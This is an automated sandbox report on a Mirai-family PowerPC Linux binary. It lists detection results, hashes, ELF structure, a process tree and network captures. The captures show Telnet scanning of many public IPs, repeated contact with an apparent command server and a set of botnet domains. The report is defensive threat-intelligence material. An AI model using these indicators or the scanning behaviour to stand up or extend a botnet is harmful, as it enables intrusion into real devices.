                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1653457 Sample: rep.ppc.elf Startdate: 01/04/2025 Architecture: LINUX Score: 80 25 qittler.ru. [malformed] 2->25 27 polizei.su. [malformed] 2->27 29 48 other IPs or domains 2->29 33 Antivirus / Scanner detection for submitted sample 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected Mirai 2->37 8 rep.ppc.elf 2->8         started        10 xfce4-session rm 2->10         started        12 xfce4-session xfwm4 2->12         started        14 12 other processes 2->14 signatures3 39 Sends malformed DNS queries 27->39 process4 process5 16 rep.ppc.elf 8->16         started        process6 18 rep.ppc.elf 16->18         started        21 rep.ppc.elf 16->21         started        23 rep.ppc.elf 16->23         started        signatures7 31 Sample tries to kill multiple processes (SIGKILL) 18->31
                SourceDetectionScannerLabelLink
                rep.ppc.elf50%VirustotalBrowse
                rep.ppc.elf47%ReversingLabsLinux.Exploit.Mirai
                rep.ppc.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches

                Download Network PCAP: filteredfull

                NameIPActiveMaliciousAntivirus DetectionReputation
                cuttiecats.ru
                45.135.194.73
                truefalse
                  high
                  qittler.ru. [malformed]
                  unknown
                  unknownfalse
                    high
                    cuttiecats.ru. [malformed]
                    unknown
                    unknownfalse
                      high
                      cat-are-here.ru. [malformed]
                      unknown
                      unknownfalse
                        high
                        mykittler.ru. [malformed]
                        unknown
                        unknownfalse
                          high
                          polizei.su. [malformed]
                          unknown
                          unknownfalse
                            high
                            kittlez.ru. [malformed]
                            unknown
                            unknownfalse
                              high
                              kittlerer.ru. [malformed]
                              unknown
                              unknownfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http:///wget.shrep.ppc.elffalse
                                  high
                                  http:///curl.shrep.ppc.elffalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    41.140.224.47
                                    unknownMorocco
                                    36903MT-MPLSMAfalse
                                    130.97.240.159
                                    unknownUnited States
                                    13326TUFTS-UNIVERSITYUSfalse
                                    68.51.53.16
                                    unknownUnited States
                                    7922COMCAST-7922USfalse
                                    97.51.54.229
                                    unknownUnited States
                                    22394CELLCOUSfalse
                                    45.135.194.73
                                    cuttiecats.ruGermany
                                    213030SKYLINKCZfalse
                                    129.247.171.52
                                    unknownGermany
                                    680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                    218.59.146.160
                                    unknownChina
                                    4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                    20.252.72.121
                                    unknownUnited States
                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    89.214.6.78
                                    unknownPortugal
                                    42863MEO-MOVELPTfalse
                                    63.60.6.42
                                    unknownUnited States
                                    701UUNETUSfalse
                                    12.150.166.125
                                    unknownUnited States
                                    2386INS-ASUSfalse
                                    59.72.61.169
                                    unknownChina
                                    4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                    206.215.173.153
                                    unknownUnited States
                                    11139CWC-ROC-11139DMfalse
                                    109.7.79.41
                                    unknownFrance
                                    15557LDCOMNETFRfalse
                                    213.62.46.246
                                    unknownEuropean Union
                                    2686ATGS-MMD-ASUSfalse
                                    16.204.78.196
                                    unknownUnited States
                                    unknownunknownfalse
                                    112.249.18.61
                                    unknownChina
                                    4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                    199.57.122.64
                                    unknownUnited States
                                    721DNIC-ASBLK-00721-00726USfalse
                                    211.98.97.40
                                    unknownChina
                                    63711CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                    146.89.161.198
                                    unknownUnited States
                                    17153NMT-ASUSfalse
                                    108.181.143.40
                                    unknownCanada
                                    852ASN852CAfalse
                                    221.190.48.86
                                    unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                    216.152.21.20
                                    unknownUnited States
                                    7018ATT-INTERNET4USfalse
                                    43.122.107.180
                                    unknownJapan4249LILLY-ASUSfalse
                                    157.112.89.233
                                    unknownJapan23620DMMDMMcomLLCJPfalse
                                    220.90.22.208
                                    unknownKorea Republic of
                                    4766KIXS-AS-KRKoreaTelecomKRfalse
                                    129.210.216.127
                                    unknownUnited States
                                    26488SCU-ASNUSfalse
                                    163.77.150.110
                                    unknownFrance
                                    17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                                    69.149.103.63
                                    unknownUnited States
                                    7018ATT-INTERNET4USfalse
                                    146.40.239.218
                                    unknownUnited States
                                    197938TRAVIANGAMESDEfalse
                                    188.98.241.185
                                    unknownGermany
                                    3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                    86.126.115.122
                                    unknownRomania
                                    8708RCS-RDS73-75DrStaicoviciROfalse
                                    9.87.19.223
                                    unknownUnited States
                                    3356LEVEL3USfalse
                                    171.114.217.29
                                    unknownChina
                                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                    200.187.88.217
                                    unknownBrazil
                                    28580CILNETComunicacaoeInformaticaLTDABRfalse
                                    113.143.169.220
                                    unknownChina
                                    4835CHINANET-IDC-SNChinaTelecomGroupCNfalse
                                    96.179.233.183
                                    unknownUnited States
                                    7922COMCAST-7922USfalse
                                    14.162.101.86
                                    unknownViet Nam
                                    45899VNPT-AS-VNVNPTCorpVNfalse
                                    209.70.82.201
                                    unknownUnited States
                                    2914NTT-COMMUNICATIONS-2914USfalse
                                    48.112.235.132
                                    unknownUnited States
                                    2686ATGS-MMD-ASUSfalse
                                    115.165.9.124
                                    unknownJapan9365ITSCOMitscommunicationsIncJPfalse
                                    162.142.13.217
                                    unknownUnited States
                                    394283BEACON-HEALTH-SYSTEMUSfalse
                                    149.219.194.158
                                    unknownGermany
                                    8303WDR-ASDEfalse
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    cuttiecats.rumpsl.elfGet hashmaliciousMiraiBrowse
                                    • 185.93.89.106
                                    rep.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 185.93.89.106
                                    mips.elfGet hashmaliciousMiraiBrowse
                                    • 185.93.89.106
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    MT-MPLSMAarm5.elfGet hashmaliciousUnknownBrowse
                                    • 196.70.15.6
                                    bimbo-ppc.elfGet hashmaliciousUnknownBrowse
                                    • 196.65.0.128
                                    resgod.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 41.143.204.113
                                    resgod.spc.elfGet hashmaliciousMiraiBrowse
                                    • 196.65.0.123
                                    resgod.x86.elfGet hashmaliciousMiraiBrowse
                                    • 41.141.72.164
                                    resgod.arm.elfGet hashmaliciousMiraiBrowse
                                    • 41.141.72.134
                                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 41.250.5.176
                                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                    • 41.142.174.155
                                    boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                    • 41.143.204.155
                                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                    • 41.140.123.154
                                    CELLCOUSarm5.elfGet hashmaliciousUnknownBrowse
                                    • 75.230.214.20
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 97.9.240.164
                                    sh4.elfGet hashmaliciousUnknownBrowse
                                    • 174.229.234.95
                                    m68k.elfGet hashmaliciousUnknownBrowse
                                    • 97.35.198.210
                                    arm7.elfGet hashmaliciousMiraiBrowse
                                    • 97.56.241.129
                                    x86.elfGet hashmaliciousMiraiBrowse
                                    • 70.223.58.99
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 72.96.13.151
                                    spc.elfGet hashmaliciousUnknownBrowse
                                    • 174.253.92.62
                                    bimbo-m68k.elfGet hashmaliciousUnknownBrowse
                                    • 70.207.124.88
                                    bimbo-x86.elfGet hashmaliciousUnknownBrowse
                                    • 166.167.83.90
                                    COMCAST-7922USarm5.elfGet hashmaliciousUnknownBrowse
                                    • 73.34.19.147
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 73.161.57.150
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 50.212.119.50
                                    sh4.elfGet hashmaliciousUnknownBrowse
                                    • 73.45.24.100
                                    m68k.elfGet hashmaliciousUnknownBrowse
                                    • 24.13.12.81
                                    arm7.elfGet hashmaliciousMiraiBrowse
                                    • 70.89.111.201
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 73.158.180.217
                                    x86.elfGet hashmaliciousUnknownBrowse
                                    • 50.165.109.53
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 174.62.136.227
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 96.83.77.68
                                    TUFTS-UNIVERSITYUSarm7.elfGet hashmaliciousMiraiBrowse
                                    • 130.98.163.250
                                    m68k.elfGet hashmaliciousGafgyt, OkiruBrowse
                                    • 130.72.111.100
                                    splppc.elfGet hashmaliciousUnknownBrowse
                                    • 130.64.114.195
                                    nabx86.elfGet hashmaliciousUnknownBrowse
                                    • 130.98.109.3
                                    telnet.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 130.64.114.177
                                    m68k.elfGet hashmaliciousUnknownBrowse
                                    • 130.97.237.102
                                    ppc.elfGet hashmaliciousMiraiBrowse
                                    • 130.97.88.191
                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 130.96.60.19
                                    teste.mips.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                    • 130.64.114.150
                                    la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                    • 130.72.81.62
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                    Entropy (8bit):6.372680221437675
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:rep.ppc.elf
                                    File size:93'112 bytes
                                    MD5:e9082b6cc402fc736c9193d14ae6d5f4
                                    SHA1:7778718ba1f24d948a6e8ac4cc1c54bf31722ee6
                                    SHA256:a187c42abbd1f889f24e082a5b436a614d09bfea86271e5bfcae1a08b9d4381a
                                    SHA512:6dbf5955955139c2b9035e883fe39f1dc0ccd8ce827875a7f840ee0cde06e064800d741326cb6cca65290fd647606747db9326cc603f64eef355b6b4d4d5dd25
                                    SSDEEP:1536:T0InRoDdlHQGD0Izw+uG8rFrnruHn6O8QhR15iiBbtiCKkRQYD:T0AA/i3rJryV1EiviCKXYD
                                    TLSH:11934B4272040A33D99305B4363F1BF0A3B7A65032E1F287644EBB565DF6E33598AF99
                                    File Content Preview:.ELF...........................4..i......4. ...(......................f...f...............f...f...f.......4p........dt.Q.............................!..|......$H...H.4q...$8!. |...N.. .!..|.......?.........i...../...@..\?.....f..+../...A..$8...})....f.N..

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, big endian
                                    Version:1 (current)
                                    Machine:PowerPC
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:UNIX - System V
                                    ABI Version:0
                                    Entry Point Address:0x100001f0
                                    Flags:0x0
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:3
                                    Section Header Offset:92632
                                    Section Header Size:40
                                    Number of Section Headers:12
                                    Header String Table Index:11
                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                    NULL0x00x00x00x00x0000
                                    .initPROGBITS0x100000940x940x240x00x6AX004
                                    .textPROGBITS0x100000b80xb80x134c80x00x6AX004
                                    .finiPROGBITS0x100135800x135800x200x00x6AX004
                                    .rodataPROGBITS0x100135a00x135a00x31100x00x2A008
                                    .ctorsPROGBITS0x100266b40x166b40x80x00x3WA004
                                    .dtorsPROGBITS0x100266bc0x166bc0x80x00x3WA004
                                    .dataPROGBITS0x100266c80x166c80x2800x00x3WA008
                                    .sdataPROGBITS0x100269480x169480x440x00x3WA004
                                    .sbssNOBITS0x1002698c0x1698c0x6c0x00x3WA004
                                    .bssNOBITS0x100269f80x1698c0x312c0x00x3WA004
                                    .shstrtabSTRTAB0x00x1698c0x4b0x00x0001
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    LOAD0x00x100000000x100000000x166b00x166b06.40820x5R E0x10000.init .text .fini .rodata
                                    LOAD0x166b40x100266b40x100266b40x2d80x34701.72420x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                    Download Network PCAP: filteredfull

                                    • Total Packets: 84
                                    • 34411 undefined
                                    • 53 (DNS)
                                    • 23 (Telnet)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 1, 2025 09:41:11.791409969 CEST4602623192.168.2.1386.126.115.122
                                    Apr 1, 2025 09:41:11.796884060 CEST4856423192.168.2.13163.77.150.110
                                    Apr 1, 2025 09:41:11.800184011 CEST4697623192.168.2.13211.98.97.40
                                    Apr 1, 2025 09:41:11.803725958 CEST3695623192.168.2.1397.51.54.229
                                    Apr 1, 2025 09:41:11.807245970 CEST3516023192.168.2.1343.122.107.180
                                    Apr 1, 2025 09:41:11.812622070 CEST5965823192.168.2.1316.204.78.196
                                    Apr 1, 2025 09:41:11.815270901 CEST5339023192.168.2.13157.112.89.233
                                    Apr 1, 2025 09:41:11.819884062 CEST5439423192.168.2.139.87.19.223
                                    Apr 1, 2025 09:41:11.823412895 CEST4904623192.168.2.1389.214.6.78
                                    Apr 1, 2025 09:41:11.826451063 CEST5821623192.168.2.1368.51.53.16
                                    Apr 1, 2025 09:41:11.829133987 CEST4969623192.168.2.13113.143.169.220
                                    Apr 1, 2025 09:41:11.832144022 CEST3440023192.168.2.13115.165.9.124
                                    Apr 1, 2025 09:41:11.836338997 CEST3678423192.168.2.1314.162.101.86
                                    Apr 1, 2025 09:41:11.839119911 CEST3844223192.168.2.13221.190.48.86
                                    Apr 1, 2025 09:41:11.842365980 CEST3869823192.168.2.13108.181.143.40
                                    Apr 1, 2025 09:41:11.847057104 CEST5052823192.168.2.13162.142.13.217
                                    Apr 1, 2025 09:41:11.850301981 CEST4983223192.168.2.1363.60.6.42
                                    Apr 1, 2025 09:41:11.905625105 CEST3292023192.168.2.13209.70.82.201
                                    Apr 1, 2025 09:41:11.915905952 CEST4687623192.168.2.1312.150.166.125
                                    Apr 1, 2025 09:41:12.056005001 CEST3938434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:12.066385031 CEST3727223192.168.2.13218.59.146.160
                                    Apr 1, 2025 09:41:12.072841883 CEST4813023192.168.2.1341.140.224.47
                                    Apr 1, 2025 09:41:12.084642887 CEST3400023192.168.2.13220.90.22.208
                                    Apr 1, 2025 09:41:12.088139057 CEST5130623192.168.2.13146.89.161.198
                                    Apr 1, 2025 09:41:12.093451023 CEST3413223192.168.2.13130.97.240.159
                                    Apr 1, 2025 09:41:12.097388983 CEST3416223192.168.2.1369.149.103.63
                                    Apr 1, 2025 09:41:12.101938963 CEST4959423192.168.2.13171.114.217.29
                                    Apr 1, 2025 09:41:12.109682083 CEST4786623192.168.2.1320.252.72.121
                                    Apr 1, 2025 09:41:12.115154982 CEST5402423192.168.2.13129.210.216.127
                                    Apr 1, 2025 09:41:12.139051914 CEST4333223192.168.2.13200.187.88.217
                                    Apr 1, 2025 09:41:12.143419027 CEST5539223192.168.2.1359.72.61.169
                                    Apr 1, 2025 09:41:12.149831057 CEST3915623192.168.2.13216.152.21.20
                                    Apr 1, 2025 09:41:12.155622959 CEST5470423192.168.2.13213.62.46.246
                                    Apr 1, 2025 09:41:12.183151960 CEST3806423192.168.2.13149.219.194.158
                                    Apr 1, 2025 09:41:12.203756094 CEST3569223192.168.2.13109.7.79.41
                                    Apr 1, 2025 09:41:12.210366964 CEST4980423192.168.2.13206.215.173.153
                                    Apr 1, 2025 09:41:12.215511084 CEST4807223192.168.2.13199.57.122.64
                                    Apr 1, 2025 09:41:12.225480080 CEST4242223192.168.2.13129.247.171.52
                                    Apr 1, 2025 09:41:12.231456041 CEST5036623192.168.2.13112.249.18.61
                                    Apr 1, 2025 09:41:12.239459038 CEST3636623192.168.2.1396.179.233.183
                                    Apr 1, 2025 09:41:12.246809006 CEST5741223192.168.2.13146.40.239.218
                                    Apr 1, 2025 09:41:12.252686024 CEST3584423192.168.2.1348.112.235.132
                                    Apr 1, 2025 09:41:12.263637066 CEST4931223192.168.2.13188.98.241.185
                                    Apr 1, 2025 09:41:13.084276915 CEST3938434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:15.100282907 CEST3938434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:19.260272980 CEST3938434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:23.173366070 CEST3943234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:24.188258886 CEST3943234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:26.204257011 CEST3943234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:30.268235922 CEST3943234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:39.187495947 CEST3943434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:40.192275047 CEST3943434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:42.204246998 CEST3943434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:46.396285057 CEST3943434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:55.201143026 CEST3943634411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:56.224329948 CEST3943634411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:41:58.236394882 CEST3943634411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:02.268385887 CEST3943634411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:11.213330030 CEST3943834411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:12.224399090 CEST3943834411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:14.236465931 CEST3943834411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:18.396372080 CEST3943834411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:27.233361006 CEST3944034411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:28.252273083 CEST3944034411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:30.272295952 CEST3944034411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:34.524327040 CEST3944034411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:43.249134064 CEST3944234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:44.252299070 CEST3944234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:46.268307924 CEST3944234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:50.400327921 CEST3944234411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:42:59.261882067 CEST3944434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:43:00.288268089 CEST3944434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:43:02.300292015 CEST3944434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:43:06.528261900 CEST3944434411192.168.2.1345.135.194.73
                                    Apr 1, 2025 09:43:15.281017065 CEST3944634411192.168.2.1345.135.194.73
                                    TimestampSource PortDest PortSource IPDest IP
                                    Apr 1, 2025 09:41:11.796120882 CEST4476153192.168.2.138.8.8.8
                                    Apr 1, 2025 09:41:11.970853090 CEST53447618.8.8.8192.168.2.13
                                    Apr 1, 2025 09:41:23.078249931 CEST4398753192.168.2.138.8.8.8
                                    Apr 1, 2025 09:41:23.172991037 CEST53439878.8.8.8192.168.2.13
                                    Apr 1, 2025 09:41:34.181962967 CEST3693353192.168.2.138.8.8.8
                                    Apr 1, 2025 09:41:50.195221901 CEST4710353192.168.2.138.8.8.8
                                    Apr 1, 2025 09:42:06.211024046 CEST4611953192.168.2.138.8.8.8
                                    Apr 1, 2025 09:42:22.227586031 CEST5565753192.168.2.138.8.8.8
                                    Apr 1, 2025 09:42:38.247018099 CEST3758353192.168.2.138.8.8.8
                                    Apr 1, 2025 09:42:54.259001970 CEST4624053192.168.2.138.8.8.8
                                    Apr 1, 2025 09:43:10.275408983 CEST5330553192.168.2.138.8.8.8
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Apr 1, 2025 09:41:11.796120882 CEST192.168.2.138.8.8.80xfb98Standard query (0)cuttiecats.ruA (IP address)IN (0x0001)false
                                    Apr 1, 2025 09:41:23.078249931 CEST192.168.2.138.8.8.80x6b92Standard query (0)cuttiecats.ruA (IP address)IN (0x0001)false
                                    Apr 1, 2025 09:41:34.181962967 CEST192.168.2.138.8.8.80x9dfaStandard query (0)kittlez.ru. [malformed]256435false
                                    Apr 1, 2025 09:41:50.195221901 CEST192.168.2.138.8.8.80xfe42Standard query (0)qittler.ru. [malformed]256451false
                                    Apr 1, 2025 09:42:06.211024046 CEST192.168.2.138.8.8.80xa92dStandard query (0)polizei.su. [malformed]256467false
                                    Apr 1, 2025 09:42:22.227586031 CEST192.168.2.138.8.8.80x1af9Standard query (0)cuttiecats.ru. [malformed]256483false
                                    Apr 1, 2025 09:42:38.247018099 CEST192.168.2.138.8.8.80x9cfaStandard query (0)mykittler.ru. [malformed]256499false
                                    Apr 1, 2025 09:42:54.259001970 CEST192.168.2.138.8.8.80x266Standard query (0)kittlerer.ru. [malformed]256259false
                                    Apr 1, 2025 09:43:10.275408983 CEST192.168.2.138.8.8.80x20b3Standard query (0)cat-are-here.ru. [malformed]256275false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Apr 1, 2025 09:41:11.970853090 CEST8.8.8.8192.168.2.130xfb98No error (0)cuttiecats.ru45.135.194.73A (IP address)IN (0x0001)false
                                    Apr 1, 2025 09:41:23.172991037 CEST8.8.8.8192.168.2.130x6b92No error (0)cuttiecats.ru45.135.194.73A (IP address)IN (0x0001)false

                                    System Behavior

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:/tmp/rep.ppc.elf
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:09
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/tmp/rep.ppc.elf
                                    Arguments:-
                                    File size:5388968 bytes
                                    MD5 hash:ae65271c943d3451b7f026d1fadccea6

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):07:41:10
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/sbin/gdm3
                                    Arguments:-
                                    File size:453296 bytes
                                    MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/etc/gdm3/PrimeOff/Default
                                    Arguments:/etc/gdm3/PrimeOff/Default
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/rm
                                    Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec7c2e14-9c4d-40f3-9704-8617ab831fb4
                                    File size:72056 bytes
                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfwm4
                                    Arguments:xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
                                    File size:420424 bytes
                                    MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfdesktop
                                    Arguments:xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
                                    File size:473520 bytes
                                    MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-panel
                                    Arguments:xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
                                    File size:375768 bytes
                                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfwm4
                                    Arguments:xfwm4 --display :1.0 --sm-client-id 27575c7dd-2dac-48f0-9f3a-eff67ec043e5
                                    File size:420424 bytes
                                    MD5 hash:59defa3c00cc30d85ed77b738d55e9da

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfdesktop
                                    Arguments:xfdesktop --display :1.0 --sm-client-id 260d40b3c-9c6a-4cb1-bbe4-3557725aa528
                                    File size:473520 bytes
                                    MD5 hash:dfb13e1581f80065dcea16f2476f16f2

                                    Start time (UTC):07:41:11
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-session
                                    Arguments:-
                                    File size:264752 bytes
                                    MD5 hash:648919f03ad356720c8c27f5aaaf75d1

                                    Start time (UTC):07:41:12
                                    Start date (UTC):01/04/2025
                                    Path:/usr/bin/xfce4-panel
                                    Arguments:xfce4-panel --display :1.0 --sm-client-id 2d6b1caf2-8023-452b-bd0d-d23295482740
                                    File size:375768 bytes
                                    MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                    Start time (UTC):07:41:21
                                    Start date (UTC):01/04/2025
                                    Path:/usr/lib/systemd/systemd
                                    Arguments:-
                                    File size:1620224 bytes
                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                    Start time (UTC):07:41:21
                                    Start date (UTC):01/04/2025
                                    Path:/lib/systemd/systemd-user-runtime-dir
                                    Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                    File size:22672 bytes
                                    MD5 hash:d55f4b0847f88131dbcfb07435178e54